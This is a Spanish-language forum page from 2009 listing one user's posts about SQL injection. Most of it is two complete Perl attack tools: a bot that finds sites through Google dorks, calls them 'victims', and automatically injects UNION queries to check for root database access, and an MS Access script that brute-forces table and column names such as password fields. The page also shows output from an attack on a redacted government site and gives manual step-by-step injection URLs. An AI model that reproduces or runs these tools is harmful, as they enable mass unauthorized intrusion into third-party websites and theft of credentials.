elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5
11  Seguridad Informática / Nivel Web / Re: Bot MySQL Search Google 2.0 en: 19 Octubre 2009, 21:04 pm
y gente alguien lo probo?
12  Seguridad Informática / Nivel Web / Bot MySQL Search Google 2.0 en: 19 Octubre 2009, 05:59 am
Bueno gente aca les dejo un BOT que que lo codee hace un tiempito atras. El que publico, está en la version 2.0.
Lo que hace el BOT es buscar en google con un patron de busqueda y luego testear si la pagina es posiblemente inyectable a SQL., en el caso de que lo sea lo guarda para despues intentar inyectar por si solo. Todo lo almacena en un archivo que nosotros le pasamos como parametro su nombre. Un Ejemplo de uso:

          
Citar
+++++++++++++++++++++++++++++++++++++
                +     Bot MySQL Search Google 2.0   +
                +         By MagnoBalt              +
                +++++++++++++++++++++++++++++++++++++

[?]Ingrese Patron de Busqueda (ej: inurl:.php?id_noticia=: >> inurl:noticias.php?id= site:com.ar
[?]Total de paginas de busquedas en Google: >> 10                                              
[?]Nombre de archivo donde guardar todo: >>argetinas.txt                                        

  • Search:
Fijense los parametros. el primero es el patron de busqueda inurl:noticias.php?id= site:com.ar
, el segundo es la cantidad de paginas para google 10, y en el tercer es el nombre del archivo donde almacenara todo para despues revisarlo con mayor tranquilidad argetinas.txt  

El ataque de la inyeccion se divide en estos pasos.+
1. Obviamente sacar la cantidad de columnas mediante la clausula UNION con una cota superior de 50. (eso lo pueden modificar en el codigo si quieren aun mas)
2. Verificar disponibilidad de Information_schema
3. Verificar disponibilidad de Mysq.Users
4. Verificar si el usuario de la base de datos es r00t. :)

Tengo pensado seguir agregandole mas cosas como busquedas atraves del BING y testeo de otras posibles formas de inyecciones. Si alguien tiene alguna sugerencia, critica, comentario, codigo lo que sea con mucho gusto sera recibido..

Aqui va el codigo.

Código
  1. #Bot MySql Search Google v 2.0
  2. #Coded by Magnobalt
  3. #contact Msn: magnobalt@gmail.com
  4. #thanks www-Insecurity.cl && www.undersecurity.net
  5.  
  6. #!/usr/bin/perl
  7.        use LWP::Simple;
  8.        use LWP::UserAgent;
  9.        use HTTP::Request;
  10.  
  11. my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } #que sistema operativo es
  12.        print "\t\t+++++++++++++++++++++++++++++++++++++\n";
  13.        print "\t\t+     Bot MySQL Search Google 2.0   +\n";
  14.        print "\t\t+         By MagnoBalt              +\n";
  15.    print "\t\t+++++++++++++++++++++++++++++++++++++\n\n";
  16.        print "[?]Ingrese Patron de Busqueda (ej: inurl:.php?id_noticia=: >> ";
  17.        $dork.=<STDIN>;
  18. chomp($dork);
  19. print "[?]Total de paginas de busquedas en Google: >> ";
  20.        $paginas.=<STDIN> ;
  21. chomp($paginas);
  22. print "[?]Nombre de archivo donde guardar todo: >>";
  23. $archivo.=<STDIN>;
  24. chomp($archivo);
  25.        open (AR,">>".$archivo) || die "No puede crear el archivo error: $!";
  26. print "\n[+]Search:\n\n";
  27. print AR "++++++++++++++++++++++++++++++++++++\n";
  28.        print AR "+     Bot MySQL Search Google V2.0 +\n";
  29.        print AR "+         By MagnoBalt             +\n";
  30. print AR "++++++++++++++++++++++++++++++++++++\n\n";
  31. print AR "Patron De Busqueda en Google: $dork y paginas utilizadas: $paginas\n";
  32. print AR "\n[+]Search:\n\n";
  33. #-----------------------------------------------------------------------------------------------------
  34. #Buscando en google vulnerabilidades
  35.        for($i = 0;$i <= $paginas*10;$i += 10)
  36.        {      
  37.        $busqueda = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$i;
  38.    $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  39.            $ua->timeout(7);
  40.            #$ua->env_proxy;
  41.            $response = $ua->get($busqueda);
  42.    $source= $response->content;
  43.            while ($source =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
  44.     $ban=0;    
  45.     my $enlace = $1;
  46.     $testing=$enlace."\'";
  47.     $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  48.     $ua->timeout(10);
  49.     $response = $ua->get($testing);
  50.     $error=$response->content;
  51. if($error=~ /mysql_fetch_/ || $error=~ /You have an error in your SQL syntax/ || $error =~ /tem um erro de sintaxe no seu SQL/ || $error =~ /mysql_num_rows/ || $error =~ /Division by zero in/) {
  52. #-----------------------------------------------------------------------------------------------------
  53. # Verifico si existe la url en entre las victimas para no redundar
  54.  foreach $exist(@victims){
  55.    my($url)=$exist=~m/(http:\/\/[\w+\.]+\/)/;
  56.    my($url2)=$enlace=~m/(http:\/\/[\w+\.]+\/)/;
  57.      if ($url eq $url2){
  58. $ban=1;
  59. }
  60. }#cierre foreach
  61.      if ($ban == 0){
  62. push(@victims,$enlace);
  63.    }
  64. #-----------------------------------------------------------------------------------------------------
  65.  }
  66.    }
  67. }#fin del for
  68.  
  69. if (@victims){ #verifico si no esta vacio el arrays
  70.  print "\n[+]Estas son las  posibles victimas:\n";
  71.  for($i=0;$i<=$#victims;$i++){
  72.  print "[$i]$victims[$i]\n";
  73.  print AR "[$i]$victims[$i]\n";
  74.      }  
  75. }else {
  76.  print "[-]No se encontraron Victimas, realiza otra busqueda o verifica si Google no la bloqueo\n";
  77.  print AR "[-]No se encontraron Victimas, realiza otra busqueda o verifica si Google no la bloqueo\n";
  78.  exit(0);
  79. }
  80. #-----------------------------------------------------------------------------------------------------
  81. # Empezando la automatizacion del bot
  82. #-----------------------------------------------------------------------------------------------------
  83. print"\n\n[+]Empezando la automatizacion del BOT\n";
  84. print AR "\n\n[+]Empezando la automatizacion del BOT\n";
  85. for($ii=0;$ii<=$#victims;$ii++){
  86. $ban2=0;
  87. $victima=$victims[$ii];
  88. print "\n[+] Inyectando a: $victima\n";
  89. $cfin ="--" ;
  90. $cmn="+";
  91. #$victims[$opc]=$victims[$opc]." *";# Coloco al final el Asterisco
  92. $victima=~s/[a-zA-Z0-9_\*\s]+$//g;;#dejo en blanco el ultimo parametro ($) para poder inyectar, inclusive los valores * y espacion en blanco con \s
  93. misma_victima:
  94. if ($ban2 == 1) {
  95.    $cfin ="/*" ;
  96.    $cmn="/**/";
  97. }
  98.  #-----------------------------------------------------------------------------------------------------
  99. #busqueda de Columnas
  100. $column=50;
  101. for ($col=0; $col <=$column;$col++){
  102.     $union.=','."0x6d61676e6f62616c74";
  103.     $numero.=','.$col;
  104.      if ($col ==0){
  105.      $union='';
  106.      $numero='';
  107.      }
  108.     $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cfin;
  109.     $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  110.     $ua->timeout(10);
  111.     $response = $ua->get($out);
  112.     $verifica=$response->content;
  113.             if ($verifica =~/magnobalt/) {
  114. $col++;
  115. print "\n[+]La web posee $col";
  116. print "\n[+]".$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0".$numero.$cfin."\n\n";
  117. print AR "[SITIO]\n";
  118. print AR "$victima\n";
  119. print AR "[+]La web posee $col\n";
  120. print AR "[+]".$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0".$numero.$cfin."\n\n";
  121. #-----------------------------------------------------------------------------------------------------
  122. #buscando Information_schema
  123. print AR "[Information_Schema]\n";
  124. $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."information_schema.tables".$cfin;#busco information schema.
  125. $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  126. $ua->timeout(10);
  127. $response = $ua->get($out);
  128. $verifica=$response->content;
  129. if ($verifica =~/magnobalt/){
  130.     print AR "[+]Information Schema Disponible\n\n";
  131.     }else {
  132.     print AR "[-]Information_Schema no Disponible\n\n";
  133.      }
  134. #-----------------------------------------------------------------------------------------------------
  135. #buscando Mysql.users
  136. print AR "[Mysql.users]\n";
  137. $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."Mysql.users".$cfin;
  138. $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  139. $ua->timeout(10);
  140. $response = $ua->get($out);
  141. $verifica=$response->content;
  142. if ($verifica =~/magnobalt/){
  143.     print AR "[+]Mysql.users Disponible\n\n";
  144.     }else {
  145.     print AR "[-]Mysql.users no Disponible\n\n";
  146.      }
  147.                 #-----------------------------------------------------------------------------------------------------
  148. #verficando si esta corriendo como root
  149. print AR "[Usuario RooT]\n";
  150. while($j < $col-1){
  151.    $root.=','."concat(0x6d61676e6f62616c74,user())";
  152.    $j++;
  153.  }
  154. $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."concat(0x6d61676e6f62616c74,user())".$root.$cfin;
  155. $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
  156. $ua->timeout(10);
  157. $response = $ua->get($out);
  158. $verifica=$response->content;
  159. if ($verifica=~/magnobaltroot@/){
  160.     print AR "[+]El usuario es root\n\n";
  161.     }else {
  162.     print AR "[-]El usuario no es root\n\n";
  163.      }
  164. push(@victims_on,$victima);
  165. $col=80;#fuerzo salida del for de columnas
  166.  
  167.     }
  168. }#cierre for de columnas
  169.  if ($ban2 == 0 && $col == 51){
  170.            $ban2=1;  
  171.      goto misma_victima;
  172.      }
  173.  if ($cfin eq "/*" && $col == 51){
  174.      push(@victims_off,$victima);
  175.    }
  176.  
  177. }#cierre for principal
  178.  
  179. #------------------------------------------------------------------------------------------------------------
  180. #imprimimos la que tuvieron exitos y las que no
  181.  
  182. print AR "[+]Paginas inyectadas exitosamente\n\n";
  183. for($i=0;$i<=$#victims_on;$i++){
  184.  print AR "[$i]$victims_on[$i]\n";
  185.      }  
  186. print "\n\n";
  187. print AR "\n[-]Estas paginas no se pudieron automatizar intentelas a mano :)\n\n";
  188. for($i=0;$i<=$#victims_off;$i++){
  189.   print AR "[$i]$victims_off[$i]\n";
  190.      }  


Saludos a Todos...

13  Seguridad Informática / Nivel Web / Re: SQL injection en: 20 Septiembre 2009, 07:27 am
Citar
Darioxhcx, ese paper es para inyecciones SQL, resulta que esta pagina usaba ACCESS.

En realidad bro ACCESS maneja tambien SQL, lo que Darioxhcx te ha pasado es un paper que si bien es para inyecciones en SQL esta basado para el Motor MYSQL


Saludos
14  Seguridad Informática / Nivel Web / Re: [Aplicación] String-Ascii by castg en: 20 Septiembre 2009, 07:22 am
Aca va el mio para pasar un string al formato char(115,116,114,105,110,103) Codeado en Perl.. Buenos codigos Sigamos con mas.. Saludos


Código
  1. #!/usr/bin/perl
  2. sub decimal {
  3. my (@arreglo2) = @_;
  4.  
  5.  
  6.  $i = 0;
  7.  foreach $letra(@arreglo2)
  8. {
  9. if ($i <= $#arreglo) {
  10. @arreglo3[$i] = ord($letra);
  11. $i++;
  12.     }
  13. }
  14. return @arreglo3;
  15. }
  16. print "====================================================\n";
  17. print "Ingresa la cadena a pasar a Decimal\n";
  18. print "dicha tiene q estar deletreada separada por coma\n";
  19. print "ejemplo: u,s,u,a,r,i,o \n";
  20. print "====================================================\n";
  21. print ">>";
  22. $cadena.=<STDIN>;
  23. chomp($cadena);
  24. print "Cadena = ";
  25. print "$cadena\n\n";
  26. @arreglo=split(",",$cadena);
  27.  
  28. print "Decimal:char(";
  29. print join ",",&decimal(@arreglo);
  30. print ")\n\n"
15  Seguridad Informática / Nivel Web / Re: dudas/problemas sql injection ms-access en: 15 Septiembre 2009, 16:27 pm
Si tenes un buen diccionario publicalo asi lo mejoro al mio
Gracias
16  Seguridad Informática / Nivel Web / Re: dudas/problemas sql injection ms-access en: 15 Septiembre 2009, 06:39 am
Hola bro si con el Null byte es para anular la inyeccion me olvide de comentarte.. eso. Y habia hecho uno tambien para encontrar las tablas en perl pero esta maso no mas le faltaba mucho mas cosas y deje a media. Pero para la pagina que estaba auditando me resulto perfecto...

Access Injection SQL

Código
  1. #!/usr/bin/perl
  2. use IO::Socket;
  3. $ban=0;
  4. @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','accesos',
  5.  'name','names','nombre','nombres','member','members','admin_table',
  6.  'miembro','miembros','membername','admins','administrator','sign',
  7.  'administrators','passwd','password','passwords','pass','Pass',
  8.  'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
  9.  'member_password','mods','mod','moderators','moderator','user_email',
  10.  'user_emails','user_mail','user_mails','mail','emails','email','address',
  11.  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  12.  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  13.  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
  14.  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  15.  'sistema_usuario','sistema_password','contrase&#65533;a','auth','key','senha','signin',
  16.  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
  17.      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
  18.      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
  19.      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
  20.      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
  21.      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
  22.  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  23. @nombrecolumna=('emailAdmin',
  24.  'passAdmin','clave','admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  25.          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  26.          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
  27.          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  28.          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  29.          'user_pwd','u_pass','clave','usuario','nom_usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','senha','MEMBER','Clave_de_acceso','passwordAdmin','nameAdmin','loginAdmin','emailAdmin',
  30.  'passAdmin','IdAdmin' ,'nameAdmin' ,'emailAdmin','passswordAdmin');
  31.  
  32.  
  33. sub socket{
  34.    my $inyec= shift;
  35. $socket = new IO::Socket::INET(
  36. PeerAddr => $host,
  37. PeerPort => 'http(80)',
  38. Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
  39. print $socket "GET " .$path.$inyec.$tabla. " HTTP/1.0\r\n";
  40. print $socket "HOST:$host\r\n";
  41. print $socket "\n\n";
  42. if ($ban ==1){
  43. print "------------------------$tabla---------------------------------------\n";}
  44. return $socket;
  45.  }
  46.  
  47. if (!@ARGV[1]) {
  48.      print "======================================================= \n";
  49.      print " Injection AIS V 1.0 beta by MagnoBalt \n\n";
  50.      print " use perl $0 www.pagina.com.ar /noticia.php?id=\n\n";
  51.  print " AIS:Acces Injection SQL \n";
  52.      print "======================================================= \n";
  53.      exit(0);
  54.      }
  55. $host =$ARGV[0];
  56. $path=$ARGV[1];
  57. print "\n[-]Buscando Tablas \n";
  58. $iny="-1+UNION+SELECT+0+FROM+";
  59. #print "antes de la funcion valor $iny\n";
  60. foreach $tabla(@nombretabla) {
  61.  chomp($tabla);  
  62.  #empuezo a guardar linea por linea el source en $response
  63.  $socket=&socket($iny);
  64.  while (<$socket>) {$response .= "$_ "}
  65.  if($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#38;#243;n no coincide/)
  66. {
  67. print "[+]Tabla $tabla FOUND\n";
  68. $tabla_aux=$tabla;
  69.    }
  70. #print $response;
  71. $response="";#limpio la variable
  72. }#cierrre foreach
  73. #buscamos numeros de columnas
  74. print "[-]Buscando numeros de columnas\n";
  75. print "[-]Ingrese Maximo con cual intentar \n";
  76. $col.=<STDIN>;
  77. chomp($col);
  78. print "[-]Buscando..\n";
  79. $columna=1;
  80. while ($columna <= $col) {
  81. $union.=','.$columna;
  82. $iny="-1+UNION+SELECT+0".$union."+FROM+".$tabla_aux;
  83. $socket=&socket($iny);
  84. while (<$socket>) { $response .= "$_ "}
  85. #print $response;  
  86. if ($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#38;#243;n no coincide/)
  87. {
  88. print "[!] Fallo intento columna $columna\n";
  89. }
  90. else {
  91. $col_aux=$columna;
  92. $columna++;
  93. print "[+]La Web Posee $columna columnas\n ";
  94. print "$ARGV[0]$ARGV[1]$iny\n";
  95. $columna = $col;#fuerzo la salida del while.
  96. }
  97. $response="";#limpio la variable
  98. $columna++;
  99. }
  100. #Bruteando las columnas
  101. print "[-]Bruteando las columnas\n";
  102. print "[-]Ingrese Tabla a la cual brutear:\n";
  103. $tabla_aux="";
  104. $tabla_aux.=<STDIN>;
  105. chomp($tabla_aux);
  106. $i=1;
  107.  
  108. while($i <= ($col_aux-1)) {#obtengo columnas menos una
  109.    $cant.=','.$i;
  110.     $i++;
  111.      }
  112. foreach $column(@nombrecolumna){
  113.   chomp($column);
  114.   $iny="-1+UNION+SELECT+0".$cant.",".$column."+FROM+".$tabla_aux;
  115.   $socket=&socket($iny);
  116. while (<$socket>) { $response .= "$_ "}
  117.  if ($response=~/No value given for one or more required parameters/ || $response=~/80040e10/) {
  118.    }
  119.  else{
  120.    print "[+] Columna $column encontrada\n";
  121.      }
  122. $response="";
  123.  }
  124.  
  125.  
  126.  
  127.  
  128.  
  129. close $socket;
  130. exit(0);



Citar
[-]Buscando Tablas
  • Tabla accesos FOUND
  • [-]Buscando numeros de columnas
    [-]Ingrese Maximo con cual intentar
    15
    [-]Buscando..
    [!] Fallo intento columna 1
    [!] Fallo intento columna 2
    [!] Fallo intento columna 3
    [!] Fallo intento columna 4
  • La Web Posee 6 columnas
www.xxxxxxxxxxxxx.gob/path/NoticiaVer.asp?id=-1+UNION+SELECT+0,1,2,3,4,5+FROM+accesos
[-]Bruteando las columnas
[-]Ingrese Tabla a la cual brutear:
accesos
  • Columna authorization encontrada
  • Columna email encontrada
  • Columna nombre encontrada
  • Columna pwd encontrada
  • Columna usuario encontrada
  • Columna passwordAdmin encontrada
17  Seguridad Informática / Nivel Web / Re: dudas/problemas sql injection mssql en: 14 Septiembre 2009, 20:37 pm
Hola kamsky, esa web que estas inyectando tiene un MS-ACCESS, por lo cual con la clausula Having no vas a poder inyectar nada, ya que esa tecnica se usa para los SQL Server. De todos modos intentadolo con UNION.
Por ejemplo:
1) Intentar brutear una posible tabla. de esta forma

www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1 from usuarios
Si la tabla usuarios no existe te arrojara un error algo similar a esto

The Microsoft Jet database engine cannot find the input table or query 'usuarios'. Make sure it exists and that its name is spelled correctly.

Ahora entonces intenta con otra tabla hasta que te tire un error de que la cantidad de columnas para UNION no conincide.. Seria algo asi

The number of columns in the two selected tables or queries of a union query do not match.



2) Ahora tenes que encontrar la cantidad de columnas

www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1,2  from usuarios
www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1,2,3  from usuarios
.
.

www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1,2,3,.....,n  from usuarios

Hasta que no haya error y puedas ver algunos numeros q colocaste de constantes en la busqueda de columnas

3) Y ahora solo queda brutear las posibles Columnas de la tabla encontrada

www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1,2,pass,....,n  from usuarios

Donde pass es la columna, si exisitiera podras ver el valor que contiene pass.. Y asi intentar con otra columnas hasta encontrar

www.pagina.es/torneo.asp?torneo=-1+UNION+SELECT+TOP 1+1,2,password,....,n  from usuarios
.
.
ETC


Espero averte ayudado asi es como yo inyhecto en ACCESS. Si alguien conoce otra forma, que la muestre

Saludos
18  Seguridad Informática / Nivel Web / Re: Optimización de SQL Union Injection en MYSQL en: 1 Agosto 2009, 06:25 am
Muy Bueno Gracias por compartir OzX Genial!!..
19  Seguridad Informática / Nivel Web / Re: por que no hace load_file este archivo??? en: 1 Agosto 2009, 06:23 am
Buenas puede ser que el usuario de Mysql no tenga permiso para leer ese Path..
Me ha pasado..

Saludos!!
20  Seguridad Informática / Nivel Web / Re: (DUDA) Haciendo SQL Injection. en: 30 Julio 2009, 19:05 pm
Hola aagos. Ahi te paso un Script en Perl hecho por Loggin-root. Si estas en Linux no tendras ningun drama con perl pero en widnows tenes que bajarte el interprete.. Busca en Google..
Aqui va el Link.. valga la redundancia esta codeado en perl

http://argentinasec.blogspot.com/2008/07/sql-pw-v07-by-login-root.html


Saludos!!
Páginas: 1 [2] 3 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines